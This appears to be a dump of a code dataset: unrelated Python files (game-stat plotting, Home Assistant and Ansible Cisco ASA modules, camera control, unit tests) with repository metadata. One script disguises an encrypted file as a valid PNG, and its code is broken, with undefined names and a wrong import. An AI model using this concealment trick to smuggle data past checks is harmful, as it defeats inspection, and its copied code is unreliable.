mercy_death_graph[player] = deaths/ult_times
avg_ult_time = lifetimes/ult_times
print("{1} lives for an average of {0} seconds and died {2} times out of {3}".format(avg_ult_time,player,deaths,ult_times))
avg_seconds_per_ult = defaultdict(dict)
std_deviation_by_player = defaultdict(dict)
for player,player_ults in time_to_charge_ult.items():
for character in player_ults:
playtime = sum(player_ults[character])
ults = len(player_ults[character])
avg = playtime/ults
avg_seconds_per_ult[character][player] = avg
summation = 0
if player == "nus" and character == "mercy":
print("ults are {0}".format(player_ults[character]))
for ult in player_ults[character]:
summation += pow(ult - avg,2)
std_dev = pow(summation/ults,0.5)
std_deviation_by_player[character][player] = std_dev/pow(avg,0.5)
print("Percentage of mercies that die in ult is {0}".format(total_mercy_deaths/(total_mercy_ults)))
print("Mercy win ratio when only ulting on one side is {0} out of {1}".format(mercy_ult_win_ratio[0]/(mercy_ult_win_ratio[1]),mercy_ult_win_ratio[1]))
analyzed_character = "mercy"
d = avg_seconds_per_ult[analyzed_character]
print(avg_seconds_per_ult[analyzed_character])
x_axis = []
y_axis = []
error = []
for w in sorted(d, key=d.get, reverse=True):
x_axis += [w]
y_axis += [d[w]]
error += [std_deviation_by_player[analyzed_character][w]]
print(x_axis)
print(y_axis)
print(error)
plt.errorbar(list(range(0,len(x_axis))), y_axis,yerr=error,fmt='o')
#plt.bar(range(len(y_axis)), list(y_axis), align='center')
plt.xticks(range(len(x_axis)), list(x_axis))
plt.xticks(rotation=90)
plt.title("Seconds to generate ult as " + analyzed_character)
plt.ylabel("seconds")
plt.tight_layout()
plt.show()
quit()
| Cheraws/AnalyzingOWL | stat_collector.py | stat_collector.py | py | 14,816 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.timedelta",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "co... |
19382433412 | """Support for Atome devices connected to a Linky Energy Meter."""
import asyncio
from .const import DATA_COORDINATOR, DOMAIN
PLATFORMS = ["sensor"]
DATA_LISTENER = "listener"
async def async_setup(hass, config):
"""Set up the KeyAtome component."""
# hass.data[DOMAIN] = {DATA_COORDINATOR: {}, DATA_LISTENER: {}}
return True
async def async_setup_entry(hass, config_entry):
"""Set up KeyAtome as config entry."""
hass.data.setdefault(DOMAIN, {DATA_COORDINATOR: {}, DATA_LISTENER: {}})
# just to initialize (if data has to be forward to plateform)
coordinator = None
# To manage options
hass.data[DOMAIN][DATA_LISTENER][
config_entry.entry_id
] = config_entry.add_update_listener(async_reload_entry)
# Useless
hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id] = coordinator
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, platform)
)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a KeyAtome config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(config_entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
# remove config flow coordinator
hass.data[DOMAIN][DATA_COORDINATOR].pop(config_entry.entry_id)
remove_listener = hass.data[DOMAIN][DATA_LISTENER].pop(config_entry.entry_id)
remove_listener()
return unload_ok
async def async_reload_entry(hass, config_entry):
"""Handle an options update."""
await hass.config_entries.async_reload(config_entry.entry_id)
| jugla/keyatome | custom_components/keyatome/__init__.py | __init__.py | py | 1,759 | python | en | code | 22 | github-code | 6 | [
{
"api_name": "const.DOMAIN",
"line_number": 19,
"usage_type": "argument"
},
{
"api_name": "const.DATA_COORDINATOR",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "const.DOMAIN",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "const.DOMAIN",
... |
24347880200 | import pytest
import zipfile
from io import BytesIO
from PIL import Image
from pathlib import Path
from zesje.raw_scans import create_copy, process_page
from zesje.scans import _process_scan, exam_metadata
from zesje.database import db, Exam, Student, Submission, Scan, Problem, ProblemWidget, ExamLayout, Copy, Page
@pytest.fixture
def app_with_data(app):
exam = Exam(name="", layout=ExamLayout.unstructured)
problem = Problem(exam=exam, name="Problem")
widget = ProblemWidget(problem=problem, x=0, y=0, width=0, height=0)
students = [Student(id=i + 1000000, first_name="", last_name="") for i in range(2)]
db.session.add(exam)
db.session.add(problem)
db.session.add(widget)
for student in students:
db.session.add(student)
db.session.commit()
yield app, exam, students
def test_create_copy(app_with_data):
app, exam, students = app_with_data
submission = Submission(exam=exam, student=students[0])
copy = create_copy(submission)
assert copy.id == copy.number
@pytest.fixture
def image_file():
with BytesIO() as image_bytes:
image = Image.new("RGB", (10, 10))
image.save(image_bytes, format="PNG")
yield image_bytes
@pytest.fixture
def zip_file(image_file):
with BytesIO() as zip_bytes:
with zipfile.ZipFile(zip_bytes, "w") as z:
z.writestr("1000000-1.png", image_file.getvalue())
z.writestr("1000001-1.png", image_file.getvalue())
zip_bytes.seek(0)
yield zip_bytes
def test_zip_process(app_with_data, zip_file):
app, exam, students = app_with_data
scan = Scan(exam=exam, name="test.zip", status="processing")
db.session.add(scan)
db.session.commit()
with open(str(scan.path), "wb") as file:
file.write(zip_file.getvalue())
_process_scan(scan.id, exam.layout)
for student in students:
sub = Submission.query.filter(Submission.student == student, Submission.exam == exam).one()
assert sub.validated
assert len(sub.copies) == 1
copy = sub.copies[0]
assert len(copy.pages) == 1
page = copy.pages[0]
assert page.number == 0
def test_reupload_page(app_with_data, zip_file):
app, exam, students = app_with_data
student = students[0]
file_name = "old.txt"
sub = Submission(exam=exam, student_id=student.id, validated=True)
copy = Copy(submission=sub, number=1)
page = Page(copy=copy, number=0, path=file_name)
db.session.add_all([sub, copy, page])
db.session.commit()
old_path = Path(app.config["DATA_DIRECTORY"]) / file_name
old_path.write_text("old image data")
image = Image.new("RGB", (10, 10))
page_info = (student.id, page.number, copy.number)
file_info = [f"{student.id}-{page.number+1}-{page.copy.number}.jpg"]
exam_config = exam_metadata(exam)
output_directory = app.config["DATA_DIRECTORY"]
process_page(image, page_info, file_info, exam_config, output_directory)
# Only a single page entry
assert Page.query.filter(Page.copy == copy, Page.number == page.number).one()
# Path was updated and only new image still exists
assert page.path != file_name
assert not old_path.exists()
assert Path(page.abs_path).exists()
| zesje/zesje | tests/test_raw_scans.py | test_raw_scans.py | py | 3,269 | python | en | code | 9 | github-code | 6 | [
{
"api_name": "zesje.database.Exam",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "zesje.database.ExamLayout.unstructured",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "zesje.database.ExamLayout",
"line_number": 15,
"usage_type": "name"
},
... |
24639710236 | import pandas as pd
from matplotlib import pyplot as plt
# plt.rcParams["figure.figsize"] = [12, 6]
plt.rcParams.update({'font.size': 11})
plt.rcParams["font.family"] = "Times New Roman"
############################ Model 1 ####################3
resnet50 = pd.read_csv(r'Dataset/resnet50.csv')
resnet50VAccu = resnet50['val_accuracy'].values.tolist()
vgg16 = pd.read_csv(r'Dataset/vgg16.csv')
vgg16VAccu = vgg16['val_accuracy'].values.tolist()
################### Comparision of 3 model ###################
axes = plt.axes()
plt.plot(range(1,len(resnet50VAccu)+1),resnet50VAccu,color='green',linewidth=2)
plt.plot(range(1,len(resnet50VAccu)+1),vgg16VAccu,color='red',linewidth=2)
plt.grid()
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
# plt.ylabel('Loss')
plt.legend(['Resnet50', 'vgg16'])
plt.savefig('2model comparision.png')
plt.show() | Mehedi-Bin-Hafiz/Rotten-fruit-detection-by-deep-learning | Graph/lineGraph.py | lineGraph.py | py | 842 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.rcParams.update",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 4,
"usage_type": "name"
},
{
"... |
3231216071 | #
# License: See LICENSE.md file
# GitHub: https://github.com/Baekalfen/PyBoy
#
__pdoc__ = {
"GameWrapperPokemonGen1.cartridge_title": False,
"GameWrapperPokemonGen1.post_tick": False,
}
import logging
from pyboy.utils import WindowEvent
from .base_plugin import PyBoyGameWrapper
logger = logging.getLogger(__name__)
try:
from cython import compiled
cythonmode = compiled
except ImportError:
cythonmode = False
class GameWrapperPokemonGen1(PyBoyGameWrapper):
"""
This class wraps Pokemon Red/Blue, and provides basic access for AIs.
If you call `print` on an instance of this object, it will show an overview of everything this object provides.
"""
cartridge_title = None
def __init__(self, *args, **kwargs):
self.shape = (20, 18)
super().__init__(*args, game_area_section=(0, 0) + self.shape, game_area_wrap_around=True, **kwargs)
self.sprite_offset = 0x1000
def enabled(self):
return self.pyboy_argv.get("game_wrapper") and ((self.pyboy.cartridge_title() == "POKEMON RED") or
(self.pyboy.cartridge_title() == "POKEMON BLUE"))
def post_tick(self):
self._tile_cache_invalid = True
self._sprite_cache_invalid = True
scanline_parameters = self.pyboy.botsupport_manager().screen().tilemap_position_list()
WX = scanline_parameters[0][2]
WY = scanline_parameters[0][3]
self.use_background(WY != 0)
def __repr__(self):
adjust = 4
# yapf: disable
return (
f"Pokemon Gen 1:\n" +
"Sprites on screen:\n" +
"\n".join([str(s) for s in self._sprites_on_screen()]) +
"\n" +
"Tiles on screen:\n" +
" "*5 + "".join([f"{i: <4}" for i in range(10)]) + "\n" +
"_"*(adjust*20+4) +
"\n" +
"\n".join(
[
f"{i: <3}| " + "".join([str(tile).ljust(adjust) for tile in line])
for i, line in enumerate(self.game_area())
]
)
)
# yapf: enable
| muddi900/PyBoy | pyboy/plugins/game_wrapper_pokemon_gen1.py | game_wrapper_pokemon_gen1.py | py | 2,149 | python | en | code | null | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cython.compiled",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "base_plugin.PyBoyGameWrapper",
"line_number": 25,
"usage_type": "name"
}
] |
25442839211 | from src.server.server import Server
import logging
logger = logging.getLogger('fmu_logger')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s_%(name)s_%(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
class Web(object):
def __init__(self):
logger.debug('Web::__init__')
try:
# f = open(os.devnull, 'w')
# sys.stdout = sys.stderr = f
self.server = Server()
except Exception as e:
logger.debug(e)
def main():
web = Web()
if __name__ == "__main__":
main()
while True:
pass | jwayneroth/mpd-touch | web/web.py | web.py | py | 607 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG... |
5086805014 | DOCUMENTATION = '''
---
module: cisco_asa_network_objectgroup
author: Patrick Ogenstad (@networklore)
version: 1.0
short_description: Creates deletes or edits network object-groups.
description:
- Configures network object-groups
requirements:
- rasa
options:
category:
description:
- The type of object you are creating. Use slash notation for networks, i.e. 192.168.0.0/24. Use - for ranges, i.e. 192.168.0.1-192.168.0.10.
choices: [ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn', 'object', 'object_group' ]
required: false
description:
description:
- Description of the object
required: false
entry_state:
description:
- State of the entire object-group
choices: [ 'present', 'absent' ]
required: false
host:
description:
- Typically set to {{ inventory_hostname }}
required: true
members:
description:
- NOT YET IMPLEMENTED Variable containing all the objects within the network object-group
required: false
name:
description:
- Name of the network object
required: true
password:
description:
- Password for the device
required: true
state:
description:
- State of the entire object-group
choices: [ 'present', 'absent' ]
required: true
username:
description:
- Username for device
required: true
validate_certs:
description:
- If no, SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
choices: [ 'no', 'yes']
default: 'yes'
required: false
value:
description:
- The data to enter into the network object
required: false
'''
EXAMPLES = '''
# Create a network object for a web server
- cisco_asa_network_object:
host={{ inventory_hostname }}
username=api_user
password=APIpass123
name=tsrv-web-1
state=present
category=IPv4Address
description='Test web server'
value='10.12.30.10'
validate_certs=no
# Remove test webserver
- cisco_asa_network_object:
host={{ inventory_hostname }}
username=api_user
password=APIpass123
name=tsrv-web-2
state=absent
validate_certs=no
'''
import sys
from ansible.module_utils.basic import *
from collections import defaultdict
try:
from rasa import ASA
has_rasa = True
except:
has_rasa = False
object_kind = {
'ipv4_address': 'IPv4Address',
'ipv6_address': 'IPv6Address',
'ipv4_subnet': 'IPv4Network',
'ipv6_subnet': 'IPv6Network',
'ipv4_range': 'IPv4Range',
'ipv6_range': 'IPv6Range',
'ipv4_fqdn': 'IPv4FQDN',
'ipv6_fqdn': 'IPv6FQDN',
'object': 'objectRef#NetworkObj',
'object_group': 'objectRef#NetworkObjGroup'
}
object_kind_type = {
'ipv4_address': 'value',
'ipv6_address': 'value',
'ipv4_subnet': 'value',
'ipv6_subnet': 'value',
'ipv4_range': 'value',
'ipv6_range': 'value',
'object': 'objectId',
'object_group': 'objectId',
}
def add_object(dev, module, net_object, member_data):
try:
result = dev.add_member_networkobjectgroup(net_object,[member_data])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to add object - %s' % result.status_code)
return True
def create_object(dev, module, desired_data):
try:
result = dev.create_networkobjectgroup(desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 201:
return_status = True
else:
module.fail_json(msg='Unable to create object - %s' % result.status_code)
return return_status
def delete_object(dev, module, name):
try:
result = dev.delete_networkobjectgroup(name)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
return_status = True
else:
module.fail_json(msg='Unable to delete object - %s' % result.status_code)
return return_status
def find_member(current_data, desired_data, module):
member_exists = False
for member in current_data['members']:
if member == desired_data:
member_exists = True
return member_exists
def main():
module = AnsibleModule(
argument_spec=dict(
host=dict(required=True),
username=dict(required=True),
password=dict(required=True),
members=dict(required=False),
name=dict(required=True),
entry_state=dict(required=False, choices=['absent', 'present']),
description=dict(required=False),
state=dict(required=True, choices=['absent', 'present']),
category=dict(required=False, choices=[ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn', 'object', 'object_group' ]),
validate_certs=dict(required=False, choices=['no', 'yes'], default='yes'),
value=dict(required=False)
),
required_together = (
['category','entry_state','value'],
),
mutually_exclusive=(['category', 'members'],),
supports_check_mode=False)
m_args = module.params
if not has_rasa:
module.fail_json(msg='Missing required rasa module (check docs)')
if m_args['validate_certs'] == 'yes':
validate_certs = True
else:
validate_certs = False
dev = ASA(
device=m_args['host'],
username=m_args['username'],
password=m_args['password'],
verify_cert=validate_certs
)
desired_data = {}
desired_data['name'] = m_args['name']
if m_args['description']:
desired_data['description'] = m_args['description']
member_data = {}
if m_args['entry_state']:
member_data['kind'] = object_kind[m_args['category']]
kind_type = object_kind_type[m_args['category']]
member_data[kind_type] = m_args['value']
if kind_type == 'objectId':
if m_args['category'] == 'object_group':
ref_link = 'https://%s/api/objects/networkobjectgroups/%s' % (m_args['host'], m_args['value'])
else:
ref_link = 'https://%s/api/objects/networkobjects/%s' % (m_args['host'], m_args['value'])
member_data['refLink'] = ref_link
desired_data['members'] = [member_data]
if m_args['members']:
pass
try:
data = dev.get_networkobjectgroup(m_args['name'])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if data.status_code == 200:
if m_args['state'] == 'absent':
changed_status = delete_object(dev, module, m_args['name'])
elif m_args['state'] == 'present' and m_args['entry_state']:
change_description = False
if m_args['description']:
current_data = data.json()
try:
if m_args['description'] == current_data['description']:
change_description = False
else:
change_description = True
except:
change_description = True
found = find_member(data.json(), member_data, module)
if found and m_args['entry_state'] == 'present':
changed_status = False
elif found and m_args['entry_state'] == 'absent':
changed_status = remove_object(dev, module, m_args['name'], member_data)
elif m_args['entry_state'] == 'present':
changed_status = add_object(dev, module, m_args['name'], member_data)
elif m_args['entry_state'] == 'absent':
changed_status = False
if change_description:
changed_status = modify_description(dev, module, m_args['name'],m_args['description'])
elif m_args['state'] == 'present' and m_args['members']:
module.fail_json(msg='This feature is eagerly awaiting to be developed')
else:
#Remove after members are implemented
module.fail_json(msg='Unknown error check arguments')
elif data.status_code == 401:
module.fail_json(msg='Authentication error')
elif data.status_code == 404:
if m_args['state'] == 'absent':
changed_status = False
elif m_args['state'] == 'present':
changed_status = create_object(dev, module, desired_data)
else:
module.fail_json(msg="Unsupported return code %s" % data.status_code)
return_msg = {}
return_msg['changed'] = changed_status
module.exit_json(**return_msg)
def modify_description(dev, module, net_object, description):
data = {}
data['description'] = description
try:
result = dev.update_networkobjectgroup(net_object, data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to change description - %s' % result.status_code)
return True
def remove_object(dev, module, net_object, member_data):
try:
result = dev.remove_member_networkobjectgroup(net_object,[member_data])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to remove object - %s' % result.status_code)
return True
def update_object(dev, module, desired_data):
try:
result = dev.update_networkobject(desired_data['name'], desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
return_status = { 'changed': True }
else:
module.fail_json(msg='Unable to update object code: - %s' % result.status_code)
return return_status
main()
| networklore/ansible-cisco-asa | library/cisco_asa_network_objectgroup.py | cisco_asa_network_objectgroup.py | py | 10,509 | python | en | code | 30 | github-code | 6 | [
{
"api_name": "sys.exc_info",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "sys.exc_info",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "sys.exc_info",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "rasa.ASA",
"line_number... |
8708427284 | #/!/bin/python
import struct
import sys
import binascii
Signature = '\x89PNG\r\n\x1a\n'
#fichier_source, fichier_cible, fichier_dest, cle_chiffrement, algo = sys.argv[1:6]
fichier_source = 'date.txt'
fichier_cible = 'ressource.PNG'
fichier_dest = 'cyber.PNG'
cle_chiffrement = 'test12345'
algo = 'aes'
if algo.lower() == "3des":
from Crypto.Cipher import DES3
TB = 8
algo = DES3
else:
from Crypto.cipher import AES
TB = 16
algo = AES
padding = lambda s: s + (TB - len(s) % TB) * chr(BS - len(s) % TB) #padding
key = cle_chiffrement
with open(fichier_source, "rb") as f:
s = padding(f.read())
with open(fichier_cible, "rb") as f:
c = padding(f.read())
p = s[:TB] # premier bloc du plaintext
ecb_dec = algo.new(key, algo.MODE_ECB)
assert TB >= 2
taille = len(s) - TB
chuncktype = 'aaaa'
cypher = Signature + struct.pack(">I",size) + chunktype
cypher = ecb_dec.decrypt(cypher)
IV = "".join([chr(ord(cypher[i]) ^ ord(p[i])) for i in range(TB)])
cbc_enc = algo.new(key, algo.MODE_CBC, IV)
resultat = cbc_enc.encrypt(s)
# écriture du crc à la fin du chunck
resultat = resultat + struct.pack(">I", binascii.crc32(resultat[12:]) % 0x100000000)
# ajouter à la suite les données de c, en passant la signature
resultat = resultat + c[8:]
# on a le résultat, la clé et l'IV
cdc_dec = algo.new(key, algo.MODE_CBC, IV)
with open(fichier_dest, "wb") as f:
f.write(cbc_dec.decrypt(padding(resultat)))
#génération du script
| buzagi/projet-pong | 1.py | 1.py | py | 1,547 | python | fr | code | 2 | github-code | 6 | [
{
"api_name": "Crypto.Cipher.DES3",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Crypto.cipher.AES",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "struct.pack",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "struct.pack",
"l... |
89150854 | # --usage: print usage
def usage():
print('Usage: python3 marvin-data/marvin.py --building|--setup|--testing')
exit(1)
# --building: build the project
def building():
import json
import subprocess
with open('project-data/definition.json', 'r') as json_file:
with open('marvin-data/build_logs.txt', 'a') as logs_file:
data = json.load(json_file)
for command in data['build-commands']:
print("===> BUILD: Running command build '" + command + "'.")
print(command)
logs_file.write(command + '\n')
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=120)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> BUILD: Command timed out.')
logs_file.write('Timed out.\n')
exit(1)
except Exception as e:
print('===> BUILD: Command failed with exception: ' + str(e))
logs_file.write('Failed with exception: ' + str(e) + '\n')
exit(1)
print(output.decode('utf-8') + error.decode('utf-8'))
logs_file.write(output.decode('utf-8') + error.decode('utf-8'))
if exit_code != 0:
print('===> BUILD: Command failed with exit code ' + str(exit_code) + '.')
exit(1)
print("===> BUILD: Done.")
exit(0)
# --setup: setup the project
def setup():
import json
import subprocess
with open('project-data/definition.json', 'r') as json_file:
data = json.load(json_file)
if 'setup-commands' not in data or len(data['setup-commands']) == 0:
print("===> SETUP: No setup commands.")
exit(0)
for command in data['setup-commands']:
print("===> SETUP: Running command setup \"" + command + "\".")
print(command)
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=120)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> SETUP: Command timed out.')
exit(1)
except Exception as e:
print('===> SETUP: Command failed with exception: ' + str(e))
exit(1)
print(output.decode('utf-8') + error.decode('utf-8'))
if exit_code != 0:
print('===> SETUP: Command failed with exit code ' + str(exit_code) + '.')
exit(1)
print("===> SETUP: Done.")
# --testing: run the tests
def testing():
import json
import subprocess
results = dict()
with open('project-data/definition.json') as json_file:
data = json.load(json_file)
for skill in data['skills']:
results[skill["name"]] = dict()
print("===> TESTING: Starting tests for skill '" + skill["name"] + "'.")
for test in skill["tests"]:
print("===> TESTING: Starting test '" + test["name"] + "'.")
print(test["command"])
results[skill["name"]][test["name"]] = dict()
try:
process = subprocess.Popen(test["command"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=60)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> TESTING: Command timed out.')
results[skill["name"]][test["name"]]['status'] = 'FAILED'
results[skill["name"]][test["name"]]['message'] = 'Timed out after 60 seconds.'
continue
except Exception as e:
print('===> TESTING: Command failed with exception: ' + str(e))
results[skill["name"]][test["name"]]['status'] = 'FAILED'
results[skill["name"]][test["name"]]['message'] = 'Failed with exception: ' + str(e)
continue
print(output.decode('utf-8'), error.decode('utf-8'))
results[skill["name"]][test["name"]]['status'] = 'PASSED' if output.decode('utf-8') == test["expected"] else 'FAILED'
if (output.decode('utf-8') != test["expected"]):
results[skill["name"]][test["name"]]['message'] = 'Expected:\n' + test["expected"] + '\nBut got:\n' + (output.decode('utf-8') + error.decode('utf-8'))
else:
results[skill["name"]][test["name"]]['message'] = test["expected"]
print("===> TESTING: Test '" + test["name"] + "' status: " + results[skill["name"]][test["name"]]['status'] + ".")
print("===> TESTING: Ending tests for skill '" + skill["name"] + "'.")
print("===> TESTING: Done.")
with open('marvin-data/results.json', 'w') as outfile:
json.dump(results, outfile)
print("===> TESTING: Results saved.")
exit(0)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
usage()
elif sys.argv[1] == '--building':
building()
elif sys.argv[1] == '--setup':
setup()
elif sys.argv[1] == '--testing':
testing()
else:
usage()
| Lqvrent/SharedMarvin | Marvin/marvin.py | marvin.py | py | 5,567 | python | en | code | 16 | github-code | 6 | [
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "subprocess.Popen",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "subprocess.TimeoutExp... |
7055484203 | from time import sleep
from onvif import ONVIFCamera
exec(open("./fix_zeep.py").read())
class Camera(object):
def __init__(self, ip, login, password, port = 80):
# Подключение
self.mycam = ONVIFCamera(ip, port, login, password)
# Создание сервиса для управления движением
self.ptz = self.mycam.create_ptz_service()
# Получение профиля, в котором содержатся необходимые токены
# (Понадобятся в запросах)
media = self.mycam.create_media_service()
self.media_profile = media.GetProfiles()[0]
self._initContinuousMove()
def _initContinuousMove(self):
# Для получения пределов движения по осям X и Y необходимо запросить параметры конфигурации сервиса PTZ
request = self.ptz.create_type('GetConfigurationOptions')
request.ConfigurationToken = self.media_profile.PTZConfiguration.token
self.ptz_configuration_options = self.ptz.GetConfigurationOptions(request)
self.XMAX = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].XRange.Max
self.XMIN = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].XRange.Min
self.YMAX = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].YRange.Max
self.YMIN = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].YRange.Min
# Для управления камерой необходимо создать запрос типа ContinuousMove
self.request = self.ptz.create_type('ContinuousMove')
self.request.ProfileToken = self.media_profile.token
# Так как в созданном запросе атрибут Velosity = None,
# замещаем его объектом с аналогичной структурой
self.request.Velocity = self.ptz.GetStatus({'ProfileToken': self.media_profile.token}).Position
self.request.Velocity.Zoom.x = 0.0
self.ptz.Stop({'ProfileToken': self.media_profile.token})
def stop(self):
self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
def _perform_move(self, timeout):
self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
# Start continuous move
self.ptz.ContinuousMove(self.request)
# Wait a certain time
# sleep(timeout)
# Stop continuous move
# self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
def move_up(self, timeout=0):
print('Moving UP')
self.request.Velocity.PanTilt.x = 0
self.request.Velocity.PanTilt.y = self.YMAX
self._perform_move(timeout)
def move_down(self, timeout=0):
print('Moving DOWN')
self.request.Velocity.PanTilt.x = 0
self.request.Velocity.PanTilt.y = self.YMIN
self._perform_move(timeout)
def move_right(self, timeout=0):
print('Moving RIGHT')
self.request.Velocity.PanTilt.x = self.XMAX
self.request.Velocity.PanTilt.y = 0
self._perform_move(timeout)
def move_left(self, timeout=0):
print ('Moving LEFT')
self.request.Velocity.PanTilt.x = self.XMIN
self.request.Velocity.PanTilt.y = 0
self._perform_move(timeout) | Maden23/CameraAudioKeyboard | ptzcamera.py | ptzcamera.py | py | 3,524 | python | ru | code | 1 | github-code | 6 | [
{
"api_name": "onvif.ONVIFCamera",
"line_number": 9,
"usage_type": "call"
}
] |
71226766908 | import unittest
from typing import Optional
from unittest import TestCase
from parameterized import parameterized
from robotlib.mathutils import Clipper, LinearExtrapolator
class TestClipper(TestCase):
@parameterized.expand([
# [min_value, max_value, x, expected_y]
[-5, 10, 0, 0],
[-5, 10, -4, -4],
[-5, 10, -5, -5],
[-5, 10, -6, -5],
[None, 10, -6, -6],
[-5, 10, 9, 9],
[-5, 10, 10, 10],
[-5, 10, 11, 10],
[-5, None, 11, 11],
])
def test_clip(
self,
min_value: Optional[float],
max_value: Optional[float],
x: float,
expected_y: float
) -> None:
clipper = Clipper(min_value, max_value)
actual_y = clipper.clip(x)
self.assertAlmostEqual(expected_y, actual_y)
def test_call(self) -> None:
clipper = Clipper(-2, 5)
x = 10
clip_result = clipper.clip(x)
call_result = clipper(x)
self.assertEqual(clip_result, call_result)
def test_get_min_value(self) -> None:
clipper = Clipper(3, 10)
actual = clipper.min_value
self.assertEqual(3, actual)
def test_set_min_value__good_value(self) -> None:
clipper = Clipper(None, 10)
clipper.min_value = 5
actual = clipper.min_value
self.assertEqual(5, actual)
def test_set_min_value__bad_value__raise_ValueError(self) -> None:
clipper = Clipper(5, 10)
with self.assertRaises(ValueError) as assert_context:
clipper.min_value = 20
self.assertEqual(
'Min value (20) cannot be greater than max value (10).',
str(assert_context.exception)
)
def test_get_max_value(self) -> None:
clipper = Clipper(3, 10)
actual = clipper.max_value
self.assertEqual(10, actual)
def test_set_max_value__good_value(self) -> None:
clipper = Clipper(5, None)
clipper.max_value = 10
actual = clipper.max_value
self.assertEqual(10, actual)
def test_set_max_value__bad_value__raise_ValueError(self) -> None:
clipper = Clipper(5, 10)
with self.assertRaises(ValueError) as assert_context:
clipper.max_value = 0
self.assertEqual(
'Max value (0) cannot be greater than min value (5).',
str(assert_context.exception)
)
class TestLinearExtrapolator(TestCase):
@parameterized.expand([
# [x, expected_y]
[0, 0],
# - Positive x
[1.0, -2],
[5.0, -10],
[9.5, -19],
[10.0, -20],
[10.5, -20],
# - Negative x
[-1, 2],
[-4.5, 9],
[-5.0, 10],
[-5.5, 10]
])
def test_extrapolate(
self,
x: float,
expected_y: float
) -> None:
extrapolator = LinearExtrapolator(
x0=1,
y0=-2,
x1=5,
y1=-10,
min_output=-20,
max_output=10
)
actual_y = extrapolator.extrapolate(x)
self.assertAlmostEqual(expected_y, actual_y)
if __name__ == '__main__':
unittest.main()
| austin-bowen/robotlib | test/python/robotlib_tests/test_mathutils.py | test_mathutils.py | py | 3,217 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "unittest.TestCase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "robotlib.mathutils.... |
